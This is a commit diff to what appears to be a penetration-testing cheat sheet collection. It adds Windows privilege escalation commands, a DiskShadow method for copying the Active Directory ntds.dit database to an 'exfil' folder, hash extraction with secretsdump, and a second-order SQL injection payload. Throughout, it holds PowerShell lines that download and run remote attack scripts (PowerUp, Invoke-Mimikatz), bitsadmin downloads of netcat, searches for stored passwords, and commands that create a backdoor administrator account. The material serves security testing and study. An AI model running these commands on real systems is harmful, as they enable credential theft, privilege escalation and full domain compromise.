Windows PrivEsc + SQLi second order + AD DiskShadow

Methodology and Resources/Active Directory Attack.md

@@ -39,6 +39,7 @@ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M met
 powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
 powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
 ```
+* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
 
 ## Most common paths to AD compromise
 
@@ -82,36 +83,59 @@ Get-NetGPOGroup
 
 
 ### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
-```c
+**Using ndtsutil**
+```powershell
 C:\>ntdsutil
 ntdsutil: activate instance ntds
 ntdsutil: ifm
 ifm: create full c:\pentest
 ifm: quit
 ntdsutil: quit
+```
 
-or
+**Using Vshadow**
-
+```powershell
 vssadmin create shadow /for=C :
 Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
 ```
+
+**Using DiskShadow (a Windows signed binary)**
+```powershell
+diskshadow.txt contains :
+set context persistent nowriters
+add volume c: alias someAlias
+create
+expose %someAlias% z:
+exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
+delete shadows volume %someAlias%
+reset
+
+then:
+diskshadow.exe /s  c:\diskshadow.txt
+dir c:\exfil
+reg.exe save hklm\system c:\exfil\system.bak
+```
+
+**Extract hashes from ntds.dit**    
 then you need to use secretsdump to extract the hashes
 ```c
 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
 ```
 
 
-Metasploit module
+**Alternatives - modules**    
+Metasploit modules
 ```c
 windows/gather/credentials/domain_hashdump
 ```
 
-
 PowerSploit module
 ```
 Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
 ```
 
+
+
 ### Golden Tickets
 Forge a TGT, require krbtgt key
 
@@ -267,4 +291,5 @@ net group "Domain Admins" hacker2 /add /domain
  * [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
  * [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
  * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
- *[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
+ *[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
+ * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)

Methodology and Resources/Windows - Privilege Escalation.md

@@ -0,0 +1,157 @@
+# Windows - Privilege Escalation
+Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
+
+
+## Windows Version and Configuration
+```powershell
+systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
+```
+
+Architecture
+```powershell
+wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
+```
+
+
+List all env variables
+```powershell
+set
+```
+
+List all drives
+```powershell
+wmic logicaldisk get caption || fsutil fsinfo drives
+```
+
+## User Enumeration
+
+Get current username
+```powershell
+echo %USERNAME% || whoami
+```
+
+List all users
+```powershell
+net user
+whoami /all
+```
+
+List logon requirements; useable for bruteforcing
+```powershell
+net accounts
+```
+
+Get details about a user (i.e. administrator, admin, current user)
+```powershell
+net user administrator
+net user admin
+net user %USERNAME%
+```
+
+List all local groups
+```powershell
+net localgroup
+```
+
+Get details about a group (i.e. administrators)
+```powershell
+net localgroup administrators
+```
+
+## Network Enumeration
+
+List all network interfaces
+```powershell
+ipconfig /all
+```
+
+List current routing table
+```powershell
+route print
+```
+
+List the ARP table
+```powershell
+arp -A
+```
+
+List all current connections
+```powershell
+netstat -ano
+```
+
+List firware state and current configuration
+```powershell
+netsh advfirewall firewall dump
+```
+
+List all network shares
+```powershell
+net share
+```
+
+## Looting for passwords
+
+Search for file contents
+```powershell
+cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
+```
+
+Search for a file with a certain filename
+```powershell
+dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
+```
+
+Search the registry for key names
+```powershell
+REG QUERY HKLM /F "password" /t REG_SZ /S /K
+REG QUERY HKCU /F "password" /t REG_SZ /S /K
+```
+
+Read a value of a certain sub key
+```powershell
+REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
+```
+
+## Processes Enum
+What processes are running?
+```powershell
+tasklist /v
+```
+
+Which processes are running as "system"
+```powershell
+tasklist /v /fi "username eq system"
+```
+
+Do you have powershell magic?
+```powershell
+REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
+```
+
+
+## Uploading / Downloading files
+a wget using powershell
+```powershell
+powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
+```
+
+wget using bitsadmin (when powershell is not present)
+```powershell
+cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
+```
+
+now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
+```powershell
+%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
+```
+
+## Spot the weak service using PowerSploit's PowerUP
+```powershell
+powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
+```
+
+## Thanks to
+* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
+* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
+* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)

Methodology and Resources/Windows - Using credentials.md

@@ -1,9 +1,14 @@
 # Windows - Using credentials
 Little tip, if you don't have credentials yet :D
-```
+```powershell
 net user hacker hacker /add
 net localgroup administrators hacker /add
 ```
+Some info about your user
+```powershell
+net user /dom
+net user /domain
+```
 
 
 ## Metasploit - SMB

SQL injection/PostgreSQL Injection.md

@@ -1,6 +1,6 @@
 # POSTGRESQL
 
-## PostgreSQL Comment
+## PostgreSQL Comments
 ```
 --
 /**/  

SQL injection/README.md

@@ -2,13 +2,19 @@
 A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
 
 ## Summary
-* [Entry point detection](#)
+* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md)
-* [DBMS Identification](#)
+* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)
-* [SQL injection using SQLmap](#)
+* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
-* [Authentication bypass](#)
+* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
-* [Polyglot injection](#)
+* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
-* [Insert Statement - ON DUPLICATE KEY UPDATE](#)
+* [Entry point detection](#entry-point-detection)
-* [WAF Bypass](#)
+* [DBMS Identification](#dbms-identification)
+* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
+* [Authentication bypass](#authentication-bypass)
+* [Polyglot injection](#polyglot-injection-multicontext)
+* [Second order injection](#second-order-injection)
+* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
+* [WAF Bypass](#waf-bypass)
 
 
 ## Entry point detection
@@ -275,6 +281,11 @@ admin") or "1"="1"/*
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 ```
 
+## Second order injection
+```sql
+admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
+```
+
 ## Insert Statement - ON DUPLICATE KEY UPDATE
 ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
 ```sql
@@ -392,7 +403,7 @@ mysql> mysql> select version();
   - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
   - [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
   - [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
-* MSQQL:
+* MSSQL:
   - [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
   - [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
 * ORACLE:

SQL injection/SQLite Injection.md

@@ -1,6 +1,6 @@
 # SQLite Injection
 
-## SQLite comment
+## SQLite comments
 ```sql
 --
 /**/